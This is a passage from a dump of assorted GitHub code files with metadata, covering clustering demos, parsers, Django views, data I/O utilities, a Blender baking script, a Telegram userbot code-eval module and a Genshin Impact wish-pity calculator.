Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9248847902","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 14 13:22:17 2017\n\n@author: KAI\n\"\"\"\n\nfrom sklearn.cluster import DBSCAN,KMeans\nfrom sklearn.datasets import make_blobs\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\nX,y=make_blobs(n_samples=1000,n_features=3,centers=4)\nX=preprocessing.minmax_scale(X)\n\nclf=DBSCAN(eps=0.1,min_samples=20,metric=\"euclidean\")\ny_pred=clf.fit_predict(X)\n\ny_pred_km=KMeans(n_clusters=4).fit_predict(X)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.set_title(\"DBSCAN\")\nax.scatter(X[:,0],X[:,1],X[:,2],c=y_pred,s=20,cmap='RdYlBu')\n\nfig2=plt.figure()\nax2 = fig2.add_subplot(111, projection='3d')\nax2.set_title(\"KMeans\")\nax2.scatter(X[:,0],X[:,1],X[:,2],c=y_pred_km,s=20,cmap='RdYlBu')\nplt.show()","repo_name":"KaygoYM/Data-Mining","sub_path":"Data_Mining_DEMO/Clustering/DBSCAN_DEMO.py","file_name":"DBSCAN_DEMO.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11422246937","text":"\r\nimport nltk\r\nfrom nltk import word_tokenize\r\nfile_path ='C:\\\\Users\\\\user\\\\Desktop\\\\nlp.txt'\r\nwith open(file_path, 'r') as file:\r\n contents = file.read()\r\n tokens=word_tokenize(contents)\r\nfor token in tokens:\r\n print(token)\r\n\r\n\r\n\r\n","repo_name":"samuelkezee/nlp","sub_path":"2tokens.py","file_name":"2tokens.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43551499334","text":"import heapq\nimport random\nfrom collections import Counter\nfrom typing import List\n\n\n# O(n) time || O(n) space\ndef top_k_frequent_quickselect(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n unique = list(cnt.keys())\n\n def partition(low, high, idx):\n freq = cnt[unique[idx]]\n unique[idx], unique[high] = unique[high], unique[idx]\n\n store_idx = low\n for i in range(low, high):\n if cnt[unique[i]] < freq:\n unique[store_idx], unique[i] = unique[i], unique[store_idx]\n store_idx += 1\n\n unique[high], unique[store_idx] = unique[store_idx], unique[high]\n\n return store_idx\n\n def quick_select(low, high, k_smallest):\n if low == high:\n return\n\n pivot_idx = random.randint(low, high)\n pivot_idx = partition(low, high, pivot_idx)\n\n if k_smallest == pivot_idx:\n return\n elif k_smallest < pivot_idx:\n quick_select(low, pivot_idx - 1, k_smallest)\n else:\n quick_select(pivot_idx + 1, high, k_smallest)\n\n n = len(unique)\n\n quick_select(0, n - 1, n - k)\n\n return unique[n - k:]\n\n\n# O(n * log(k)) time || O(n + k) space\ndef top_k_frequent_heap(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n\n return heapq.nlargest(k, cnt, cnt.get)\n\n\n# O(n) time || O(n) space\ndef top_k_frequent_linear(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n freq = [[] for _ in range(len(nums) + 1)]\n for n, c in cnt.items():\n freq[c].append(n)\n\n res = []\n for i in range(len(freq) - 1, 0, -1):\n for n in freq[i]:\n res.append(n)\n\n if len(res) == k:\n return 
res\n","repo_name":"solairerove/leetcode-leprosorium-python","sub_path":"arrays/TopKFrequentElements.py","file_name":"TopKFrequentElements.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"26680860223","text":"class ShiftReduceParser:\n SHIFT = 'SHIFT'\n REDUCE = 'REDUCE'\n OK = 'OK'\n\n def __init__(self, G, verbose=False):\n self.G = G\n self.verbose = verbose\n self.action = {}\n self.goto = {}\n self._build_parsing_table()\n\n def _build_parsing_table(self):\n raise NotImplementedError()\n\n def __call__(self, w, get_shift_reduce=False):\n stack = [0]\n cursor = 0\n output = []\n operations = []\n\n while True:\n state = stack[-1]\n lookahead = w[cursor]\n if self.verbose: print(stack, w[cursor:])\n try:\n action, tag = self.action[state, lookahead.token_type.Name][0]\n if action == ShiftReduceParser.SHIFT:\n operations.append(self.SHIFT)\n stack.append(tag)\n cursor += 1\n elif action == ShiftReduceParser.REDUCE:\n operations.append(self.REDUCE)\n for _ in range(len(tag.Right)): stack.pop()\n stack.append(self.goto[stack[-1], tag.Left.Name][0])\n output.append(tag)\n elif action == ShiftReduceParser.OK:\n return output if not get_shift_reduce else (output, operations)\n else:\n assert False, 'Must be something wrong!'\n except KeyError:\n raise ParsingException(\n f'Syntax error near token {lookahead.lex}')\n\n\nclass ParsingException(Exception):\n @property\n def text(self) -> str:\n return self.args[0]\n","repo_name":"adrian13579/CoolInterpreter","sub_path":"cmp/parsers/shift_reduce_parser.py","file_name":"shift_reduce_parser.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"8718557532","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import BlogSerializer\nfrom .models import Blog\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_all_post(request):\n query_set = Blog.objects.all()\n serializer = BlogSerializer(query_set,many=True)\n return Response({'all_blogs': serializer.data})\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef add_post(request):\n data = request.data\n data['creation_user'] = request.user.first_name + \" \" + request.user.last_name\n #return Response({'Errors': \"erros\"})\n serializer = BlogSerializer(data = data)\n if serializer.is_valid():\n all_post = Blog.objects.create(**data)\n response = BlogSerializer(all_post,many=False)\n return Response({'allPost': response.data})\n else:\n return Response({'Errors': serializer.errors})\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated]) \ndef update_post(request,pk):\n blog = get_object_or_404(Blog,id=pk)\n if not request.data :\n return Response({'Errors':\"You can't be update post due passing parameters failed\"},status=status.HTTP_403_FORBIDDEN)\n blog.name= request.data.get('title')\n blog.content= request.data.get('content')\n blog.save()\n serializer = BlogSerializer(blog,many=False)\n return Response({'postDetails': serializer.data})\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_post(request,pk):\n blog = get_object_or_404(Blog,id=pk)\n if blog.creation_user != request.user.first_name +\" \"+ 
request.user.last_name :\n return Response({'Errors':\"You can't be deleted post\"},status=status.HTTP_403_FORBIDDEN)\n blog.delete()\n return Response({'details':'Products deleted successfully..!'},status= status.HTTP_200_OK)\n","repo_name":"Dileepkumarpatelpalamu/blog-api-jwt","sub_path":"blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37528890471","text":"\"\"\"\nModule to set optimizer\n\"\"\"\nimport tensorflow as tf\nimport horovod.tensorflow as hvd\n\n_ALLOWED_OPTIMIZERS = [\"sgd\", \"sgdm\", \"adam\", \"rmsprop\"]\n\n\ndef get_optimizer(params):\n lr = params[\"learning_rate\"] * hvd.size()\n optimizer_name = params[\"optimizer_name\"]\n if optimizer_name in _ALLOWED_OPTIMIZERS:\n if optimizer_name == \"adam\":\n optimizer = tf.compat.v1.train.AdamOptimizer(\n learning_rate=lr,\n beta1=params[\"beta1\"],\n beta2=params[\"beta2\"],\n epsilon=params[\"epsilon\"],\n name=\"adam\",\n )\n elif optimizer_name == \"rmsprop\":\n optimizer = tf.compat.v1.train.RMSPropOptimizer(\n learning_rate=lr,\n decay=params[\"decay\"],\n epsilon=params[\"epsilon\"],\n name=\"rmsprop\",\n )\n elif optimizer_name == \"sgdm\":\n optimizer = tf.compat.v1.train.MomentumOptimizer(\n learning_rate=lr,\n momentum=params[\"momentum\"],\n name=\"sgd_momentum\",\n )\n elif optimizer_name == \"sgd\":\n optimizer = tf.compat.v1.train.GradientDescentOptimizer(\n learning_rate=lr,\n name=\"sgd\",\n )\n else:\n raise AssertionError(\n f\"Optimizer is in allowed list {_ALLOWED_OPTIMIZERS},\"\n f\"but not defined, passed {optimizer_name}\"\n )\n else:\n raise AssertionError(\n f\"Supported optimizer are {_ALLOWED_OPTIMIZERS},\" f\"passed {optimizer_name}\"\n )\n return hvd.DistributedOptimizer(optimizer)\n","repo_name":"braceal/SC20-GB-CS1-ThetaGPU-AI-driven-MD","sub_path":"deepdrivemd/models/symmetric_cvae/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29723376654","text":"import h5py\nimport yaml\nimport csv\nimport numpy as np\nimport pandas as pd\nimport os.path as path\n\n\ndef load_csv(file_name, header=None, col_name=None, index_col=None, dtype=None, delim=','):\n \"\"\"\n Read list of rows in csv, separated by delimiter\n # Output\n pandas DataFrame\n \"\"\"\n res = pd.read_csv(file_name, header=header, names=col_name,\n index_col=index_col, dtype=dtype, delimiter=delim)\n return res\n\n\ndef save_csv(file_name, list_data, delim=','):\n \"\"\"Save list of rows to csv, separated by delim\n e.g. list_data=zip(l1, l2, l3)\n \"\"\"\n with open(file_name, 'wt') as f:\n writer = csv.writer(f, delimiter=delim)\n for result_item in list_data:\n write_it = [it for it in result_item if it is not '']\n writer.writerow(write_it)\n\n\ndef load_txt(file_name):\n with open(file_name) as f:\n raw = f.readlines()\n lines = [s.strip() for s in raw]\n return lines\n\n\ndef load_yaml(file_name):\n with open(file_name, 'r') as f:\n return yaml.load(f)\n\n\ndef load_dictionary(file_name, delim=' '):\n \"\"\"\n Load text file as dictionary:\n 1st column are keys, the rest columns are values\n \"\"\"\n d = {}\n with open(file_name) as f:\n for line in f:\n sl = line.split(delim)\n clean_list = map(str.strip, sl)\n d[clean_list[0]] = clean_list[1:]\n return d\n\n\ndef load_mlf(file_name, lab_ext='lab'):\n \"\"\"\n Load Master Label Files (MLF), e.g. 
applied in HTK toolkit or KALDI\n file_name: file path to the MLF\n lab_ext: extension of aligned audio files inside MLF file\n # Output\n dictionary: {file_id: list_of_events}\n \"\"\"\n mlf_dict = {}\n with open(file_name) as f:\n header = f.next().strip()\n if header != '#!MLF!#':\n raise AttributeError('[ERROR] Header is not defined %s' % header)\n\n fid_now = None\n events = []\n for line in f:\n line = line.strip()\n if '.' + lab_ext in line: # file alignment name\n fpath = line.replace('\"', '')\n base = path.basename(fpath)\n fid_now = path.splitext(base)[0]\n elif line == '.': # end of alignment\n mlf_dict[fid_now] = events\n events = []\n fid_now = None\n else:\n event = line.split()\n events.append(event)\n return mlf_dict\n\n\ndef save_mlf(file_name, mlf_dict, lab_ext='lab'):\n \"\"\"\n Load Master Label Files (MLF), e.g. applied in HTK toolkit or KALDI\n file_name: file path to the MLF\n mlf_dict: dictionary. {file_id: list_of_events}\n lab_ext: extension of aligned files inside MLF file\n \"\"\"\n header = '#!MLF!#\\n'\n end = '.\\n'\n with open(file_name, 'w') as f:\n f.write(header)\n\n for file_id, events in mlf_dict.items():\n fname = '\"*/%s.%s\"\\n' % (file_id, lab_ext)\n f.write(fname)\n for ev in events:\n f.write(' '.join(ev) + '\\n')\n f.write(end)\n\n\ndef save_ark(file_name, utt_feat):\n with open(file_name, 'w') as file:\n for utt, feats in utt_feat.items():\n head = \"%s [\" % utt\n txt_feat = \"\\n \".join(\" \".join(str(i) for i in x) for x in feats)\n file.write(\"%s \\n %s ]\\n\" % (head, txt_feat))\n\n\nclass HDFWriter(object):\n \"\"\"\n Save data features in single hdf5 file storage\n file_name: String. Hdf5 file storage name\n \"\"\"\n\n def __init__(self, file_name):\n self.hdf = h5py.File(file_name, \"w\")\n\n def append(self, file_id, feat, tag=None):\n \"\"\"\n file_id: unique identifier of the data feature file\n tag: hot-encoded 1D array, where '1' marks class on\n \"\"\"\n if file_id in self.hdf.keys():\n print('[WARN] File already exists in the storage: %s' % file_id)\n else:\n # if file not exists then store it to hdf\n data = self.hdf.create_dataset(name=file_id, data=feat)\n if tag is not None:\n data.attrs['tag'] = tag\n\n def close(self):\n self.hdf.close()\n\n @staticmethod\n def load_data(file_name, keys=None):\n \"\"\"\n Lazy load all datasets from hdf5 to the memory\n NOTE: not preferred to run for large dataset\n file_name: String. Path to hdf5 file storage\n keys: list. 
List of file ids\n \"\"\"\n hdf = h5py.File(file_name, \"r\")\n if keys is None:\n files = list(hdf.keys())\n print('Files in dataset: %d' % len(files))\n else:\n files = keys\n print('Files by keys: %d' % len(files))\n\n X, Y = [], []\n for fn in hdf:\n X.append(np.array(hdf[fn]))\n Y.append(hdf[fn].attrs['tag'])\n hdf.close()\n return np.array(X), np.array(Y)\n\n\nclass ArkReader(object):\n START_MARK = '['\n END_MARK = ']'\n\n def __init__(self, data_file):\n self.data_file = data_file\n\n @staticmethod\n def grep(data_file, pattern='['):\n with open(data_file, 'r') as file:\n match = [line for line in file if pattern in line]\n return match\n\n @staticmethod\n def ark_len(data_file):\n match = ArkReader.grep(data_file, ArkReader.START_MARK)\n return len(match)\n\n def next_ark(self):\n \"\"\"\n Read file with arks: every ark file one-by-one\n # Return\n file_id, features ndarray\n \"\"\"\n cnt = 0\n with open(self.data_file, 'r') as file:\n utt = ''\n feats = []\n for line in file:\n # start of the features\n if ArkReader.START_MARK in line:\n utt = line.strip().split()[0]\n cnt += 1\n # end of the features\n elif ArkReader.END_MARK in line:\n tmp = line.replace(ArkReader.END_MARK, '')\n tmp = tmp.strip().split()\n feats.append(tmp)\n # return current ark file\n yield utt, self._str2float(feats)\n utt = ''\n feats = []\n else:\n # read features\n feats.append(line.strip().split())\n\n def _str2float(self, arr):\n return np.array(arr).astype(np.float)\n\n\nclass ArkWriter(object):\n START_MARK = '['\n END_MARK = ']'\n\n def __init__(self, data_file):\n self.ark_file = open(data_file)\n\n def append(self, utt_feat):\n utt, feat = utt_feat\n head = '%s [' % utt\n txt_feat = '\\n '.join(' '.join(str(i) for i in x) for x in feat)\n self.ark_file.write('%s \\n %s ]\\n' % (head, txt_feat))\n\n def close(self):\n self.ark_file.close()\n","repo_name":"Vanova/mfom_attribute_detection","sub_path":"src/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"23389032048","text":"# Bake vertex colors to texture image\n# Run with: blender -b -P bake_vertex_colors_to_texture_image.py -- INPUT_PLY OUTPUT_OBJ\n# Tested with blender 3.0.0\n# Input: PLY format with vertex color attributes i.e. 
rgb channels\n# Output: OBJ format with texture image\n\nimport bpy\nimport argparse\nimport sys\nimport os\n\nindex = sys.argv.index('--')\n\nparser = argparse.ArgumentParser(\n description='Bake vertex colors to texture image')\nparser.add_argument('INPUT_PLY', type=str,\n help='Input PLY File')\nparser.add_argument('OUTPUT_OBJ', type=str,\n help='Output OBJ File')\n\nargs = parser.parse_args(sys.argv[index:])\ninput_ply = args.INPUT_PLY\noutput_obj = args.OUTPUT_OBJ\nname, _ = os.path.splitext(output_obj)\noutput_png = '{}.png'.format(name)\noutput_mtl = '{}.mtl'.format(name)\n\nprint('Input PLY: {}'.format(input_ply))\nprint('Output OBJ: {}'.format(output_obj))\nprint('Output PNG: {}'.format(output_png))\nprint('Output MTL: {}'.format(output_mtl))\n\n# https://docs.blender.org/api/current/bpy.data.html\nprint('Remove default cube mesh')\nif \"Cube\" in bpy.data.meshes:\n mesh = bpy.data.meshes[\"Cube\"]\n bpy.data.meshes.remove(mesh)\n\nprint('Import PLY')\nbpy.ops.import_mesh.ply(\n filepath=input_ply)\n\nprint('Toggle edit mode')\nbpy.ops.object.editmode_toggle()\n\nprint('UV smart project')\nbpy.ops.uv.smart_project()\n\n# https://blender.stackexchange.com/questions/5668/add-nodes-to-material-with-python\nprint('Add shading material')\nmaterial = bpy.data.materials.new('SomeMaterial')\nmaterial.use_nodes = True\nnodes = material.node_tree.nodes\n\nprint('Toggle edit mode')\nbpy.ops.object.editmode_toggle()\n\nprint('Add input vertex color')\ninput_node = nodes.new('ShaderNodeVertexColor')\nbsdf_node = nodes.get('Principled BSDF')\n\nprint('Link vertex color to bsdf')\nmaterial.node_tree.links.new(bsdf_node.inputs[0], input_node.outputs[0])\n\nprint('Add texture image')\ntexture_node = nodes.new('ShaderNodeTexImage')\n\nprint('Create empty image')\nimage = bpy.data.images.new(name='SomeImage', width=1024, height=1024)\n\nprint('Assign image to node')\ntexture_node.image = image\n\nprint('Switch to CYCLES render engine')\nbpy.context.scene.render.engine = 'CYCLES'\n\nprint('Select active material')\nbpy.context.active_object.active_material = material\n\nprint('Bake image')\nbpy.context.view_layer.objects.active = bpy.context.active_object\nbpy.ops.object.bake(type='DIFFUSE',\n pass_filter={'COLOR'}, use_clear=True)\n\nprint('Save image')\nimage.save_render(output_png)\n\n# set map_Kd correctly in mtl file\nprint('Set image path')\nimage.filepath = os.path.basename(output_png)\n\nprint('Connect texture node to bsdf')\nmaterial.node_tree.links.new(bsdf_node.inputs[0], texture_node.outputs[0])\n\nprint('Export OBJ')\nbpy.ops.export_scene.obj(filepath=output_obj)\n","repo_name":"jiegec/blender-scripts","sub_path":"bake_vertex_colors_to_texture_image.py","file_name":"bake_vertex_colors_to_texture_image.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"73752816456","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nfrom nova.kontroll_element_format import KontrollElementFormat\nfrom nova.sprach_code import SprachCode\n\n__NAMESPACE__ = \"http://nova.voev.ch/services/v14/vertrieb\"\n\n\n@dataclass\nclass KontrollElementParameter:\n \"\"\"\n :ivar sprache: Moegliche Werte: DE, EN, IT, FR\n :ivar format: Moegliche Werte: PNG, RAW\n \"\"\"\n sprache: Optional[SprachCode] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"namespace\": \"http://nova.voev.ch/services/v14/vertrieb\",\n }\n )\n format: Optional[KontrollElementFormat] = field(\n 
default=None,\n metadata={\n \"type\": \"Attribute\",\n \"namespace\": \"http://nova.voev.ch/services/v14/vertrieb\",\n }\n )\n","repo_name":"openTdataCH/ojp-nova","sub_path":"nova/kontroll_element_parameter.py","file_name":"kontroll_element_parameter.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13574596559","text":"import itertools\nimport logging\nfrom traceback import format_exc\nfrom types import ModuleType\nimport os\n\nimport telethon\nfrom meval import meval\nfrom telethon.errors.rpcerrorlist import MessageIdInvalidError\nfrom telethon.tl.types import Message\n\nfrom .. import loader, main, utils\nfrom ..inline.types import InlineCall\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeDbException(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass FakeDb:\n def __getattr__(self, *args, **kwargs):\n raise FakeDbException(\"Database read-write permission required\")\n\n\n@loader.tds\nclass PythonMod(loader.Module):\n \"\"\"Evaluates python code\"\"\"\n\n strings = {\n \"name\": \"Python\",\n \"eval\": \"🎬 Code:\\n{}\\n🪄 Result:\\n{}\",\n \"err\": \"🎬 Code:\\n{}\\n\\n🚫 Error:\\n{}\",\n \"db_permission\": (\n \"⚠️ Do not use db.set, db.get \"\n \"and other db operations. You have core modules to control anything you \"\n \"want\\n\\nTheses commands may crash your userbot or \"\n \"even make it unusable! Do it on your own risk\\n\\n\"\n \"If you issue any errors after allowing this option, you will not \"\n \"get any help in support chat!\"\n ),\n }\n\n strings_ru = {\n \"eval\": \"🎬 Код:\\n{}\\n🪄 Результат:\\n{}\",\n \"err\": \"🎬 Код:\\n{}\\n\\n🚫 Ошибка:\\n{}\",\n \"db_permission\": (\n \"⚠️ Не используй db.set, db.get \"\n \"и другие операции с базой данных. У тебя есть встроенные модуля для управления ей\\n\\n\"\n \"Эти команды могут нарушить работу юзербота, или вообще сломать\"\n \" его! 
Используй эти команды на свой страх и риск\\n\\nЕсли появятся какие-либо \"\n \"проблемы, вызванные после этой команды, ты не получишь помощи в чате!\"\n ),\n \"_cmd_doc_eval\": \"Алиас для команды .e\",\n \"_cmd_doc_e\": \"Выполняет Python кодировка\",\n \"_cls_doc\": \"Выполняет Python код\",\n }\n\n async def client_ready(self, client, db):\n self._client = client\n self._db = db\n self._phone = (await client.get_me()).phone\n\n @loader.owner\n async def evalcmd(self, message: Message):\n \"\"\"Alias for .e command\"\"\"\n await self.ecmd(message)\n\n async def inline__allow(self, call: InlineCall):\n await call.answer(\"Now you can access db through .e command\", show_alert=True)\n self._db.set(main.__name__, \"enable_db_eval\", True)\n await call.delete()\n\n @loader.owner\n async def ecmd(self, message: Message):\n \"\"\"Evaluates python code\"\"\"\n ret = self.strings(\"eval\")\n try:\n it = await meval(\n utils.get_args_raw(message),\n globals(),\n **await self.getattrs(message),\n )\n except FakeDbException:\n await self.inline.form(\n self.strings(\"db_permission\"),\n message=message,\n reply_markup=[\n [\n {\n \"text\": \"✅ Allow\",\n \"callback\": self.inline__allow,\n },\n {\"text\": \"🚫 Cancel\", \"action\": \"close\"},\n ]\n ],\n )\n return\n except Exception:\n exc = format_exc().replace(self._phone, \"📵\")\n\n if os.environ.get(\"DATABASE_URL\"):\n exc = exc.replace(\n os.environ.get(\"DATABASE_URL\"),\n \"postgre://**************************\",\n )\n\n if os.environ.get(\"hikka_session\"):\n exc = exc.replace(\n os.environ.get(\"hikka_session\"),\n \"StringSession(**************************)\",\n )\n\n await utils.answer(\n message,\n self.strings(\"err\").format(\n utils.escape_html(utils.get_args_raw(message)),\n utils.escape_html(exc),\n ),\n )\n\n return\n ret = ret.format(\n utils.escape_html(utils.get_args_raw(message)),\n utils.escape_html(it),\n )\n ret = ret.replace(str(self._phone), \"📵\")\n\n postgre = os.environ.get(\"DATABASE_URL\") or main.get_config_key(\"postgre_uri\")\n if postgre:\n ret = ret.replace(postgre, \"postgre://**************************\")\n\n redis = os.environ.get(\"REDIS_URL\") or main.get_config_key(\"redis_uri\")\n if redis:\n ret = ret.replace(redis, \"redis://**************************\")\n\n if os.environ.get(\"hikka_session\"):\n ret = ret.replace(\n os.environ.get(\"hikka_session\"),\n \"StringSession(**************************)\",\n )\n\n try:\n await utils.answer(message, ret)\n except MessageIdInvalidError:\n pass\n\n async def getattrs(self, message):\n reply = await message.get_reply_message()\n return {\n **{\n \"message\": message,\n \"client\": self._client,\n \"reply\": reply,\n \"r\": reply,\n **self.get_sub(telethon.tl.types),\n **self.get_sub(telethon.tl.functions),\n \"event\": message,\n \"chat\": message.to_id,\n \"telethon\": telethon,\n \"utils\": utils,\n \"main\": main,\n \"loader\": loader,\n \"f\": telethon.tl.functions,\n \"c\": self._client,\n \"m\": message,\n \"lookup\": self.lookup,\n \"self\": self,\n },\n **(\n {\n \"db\": self._db,\n }\n if self._db.get(main.__name__, \"enable_db_eval\", False)\n else {\n \"db\": FakeDb(),\n }\n ),\n }\n\n def get_sub(self, it, _depth: int = 1) -> dict:\n \"\"\"Get all callable capitalised objects in an object recursively, ignoring _*\"\"\"\n return {\n **dict(\n filter(\n lambda x: x[0][0] != \"_\"\n and x[0][0].upper() == x[0][0]\n and callable(x[1]),\n it.__dict__.items(),\n )\n ),\n **dict(\n itertools.chain.from_iterable(\n [\n self.get_sub(y[1], _depth + 
1).items()\n for y in filter(\n lambda x: x[0][0] != \"_\"\n and isinstance(x[1], ModuleType)\n and x[1] != it\n and x[1].__package__.rsplit(\".\", _depth)[0]\n == \"telethon.tl\",\n it.__dict__.items(),\n )\n ]\n )\n ),\n }\n","repo_name":"Netuzb/sosi","sub_path":"hikka/modules/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":7684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"33264352834","text":"import genshinstats as gs\nimport genshin as gs_\nimport os, time, json, sys\nfrom dotenv import load_dotenv\nfrom time import sleep\n\nload_dotenv(dotenv_path='settings.env')\n\nwith open(f'lang/{os.getenv(\"lan\")}.json', 'r', encoding='utf-8') as lang:\n lang = json.load(lang)\n ID = lang['id']\n ERROR = lang['error_banner']\n PITY5 = lang['5*pity']\n PITY4 = lang['4*pity']\n REPEAT_ERROR = lang['repeat_error']\n REPEAT_ERROR2 = lang['repeat_error2']\n REPEAT = lang['repeat']\n REPEAT_W = lang['repeat_w']\n AUTH_ERROR = lang['auth_error']\n AUTH_TIMEOUT = lang['auth_timeout']\n QUIT_ = lang['quit']\n LAST = lang['last']\n NO_WISH_HISTORY_ERROR = lang['no_wish_history_error']\n NO_WISH_HISTORY_ERROR2 = lang['no_wish_history_error2']\n SOFT = lang['soft']\n TSOFT = lang['tsoft']\n CACHE = lang['cache']\n LCACHE = lang['load_cache']\n NOCACHE = lang['no_cache']\n NEXT = lang['next']\n PERMS_ERROR = lang['perms_error']\n\ndef search_string_in_file(file_name, string_to_search):\n line_number = 0\n list_of_results = []\n with open(file_name, 'r') as read_obj:\n for line in read_obj:\n line_number += 1\n if string_to_search in line:\n list_of_results.append((line_number, line.rstrip()))\n read_obj.close()\n return list_of_results\n\nif os.getenv('cache') == \"True\":\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play') == False:\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play')\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')\n else:\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc') == False:\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')\n\n# https://webstatic-sea.hoyoverse.com/genshin/ - 44\n\nglobal S_MSG\nS_MSG = False\n\nif os.getenv('authkey')[0:44] != 'https://webstatic-sea.hoyoverse.com/genshin/':\n if os.getenv('authkey') == 'auto':\n if os.getenv('gameloc') == \"None\":\n try:\n AUTH = gs_.utility.get_authkey()\n except PermissionError:\n print('\\33[31m' + PERMS_ERROR + '\\33[0m')\n AUTH = \"sus\"\n S_MSG = True\n else:\n try:\n AUTH = gs_.utility.get_authkey(os.getenv('gameloc'))\n except PermissionError:\n print('\\33[31m' + PERMS_ERROR + '\\33[0m')\n AUTH = \"sus\"\n S_MSG = True\n else:\n print('\\33[31m' + AUTH_ERROR + '\\33[0m')\n quit()\nelse:\n AUTH = gs.extract_authkey(os.getenv('authkey'))\n\nREPEAT_FLAG = os.getenv('repeat')\nr_a = ['ask', 'no', 'yes']\n\nif REPEAT_FLAG not in r_a:\n print('\\33[31m' + REPEAT_ERROR + '\\33[0m')\n quit()\n\nglobal BANNER\nBANNER = 301\n\ndef check_():\n if os.path.exists('log.txt') == True:\n os.remove('log.txt')\n\n list_rec = 90\n if BANNER == 302:\n list_rec = 80\n\n for s in gs.get_wish_history(BANNER, 200, authkey=AUTH):\n with open('log.txt', \"a+\", encoding='utf-8') as file:\n file.write(f\"{s['rarity']}* - {s['name']}, {s['type']}\" + '\\n')\n file.close()\n\n print(time.strftime('%H:%M:%S'))\n\n star5_ = search_string_in_file('log.txt', '5* - ')\n\n dict_prc = {74: '6.6%', 75: '12.6%', 76: '18.6%', 77: '24.6%', 78: '30.6%', 79: '36.6%', 80: '42.6%', 81: '48.6%', 82: '54.6%', 83: 
'60.6%', 84: '66.6%', 85: '72.6%', 86: '78.6%', 87: '84.6%', 88: '90.6%', 89: '96.6%', 90: '100%'}\n\n load = False\n\n if str(star5_) == '[]':\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json') == True:\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n print('\\33[93m' + CACHE + '\\33[0m')\n isoft = int(data['5*'][0]['soft'])\n if list_rec == 80:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n else:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n \n print(f'{PITY5}' + f'{data[\"5*\"][0][\"pity\"]}' + f'\\n{LAST} 5*: ' + f'{data[\"5*\"][0][\"last\"]}')\n if data[\"5*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + f'{data[\"5*\"][0][\"next\"]}')\n data_.close()\n load = True\n else:\n print(f'{PITY5}' + f'{NO_WISH_HISTORY_ERROR} 5*' + f'\\n{LAST} 5*: ' + NO_WISH_HISTORY_ERROR2)\n load = True\n\n n5star = None\n\n for star5 in star5_:\n n_star5 = list_rec - int(star5[0]) + 1\n if n_star5 <= 0:\n n_star5 = 1\n\n isoft = list_rec - n_star5\n if list_rec == 90:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n 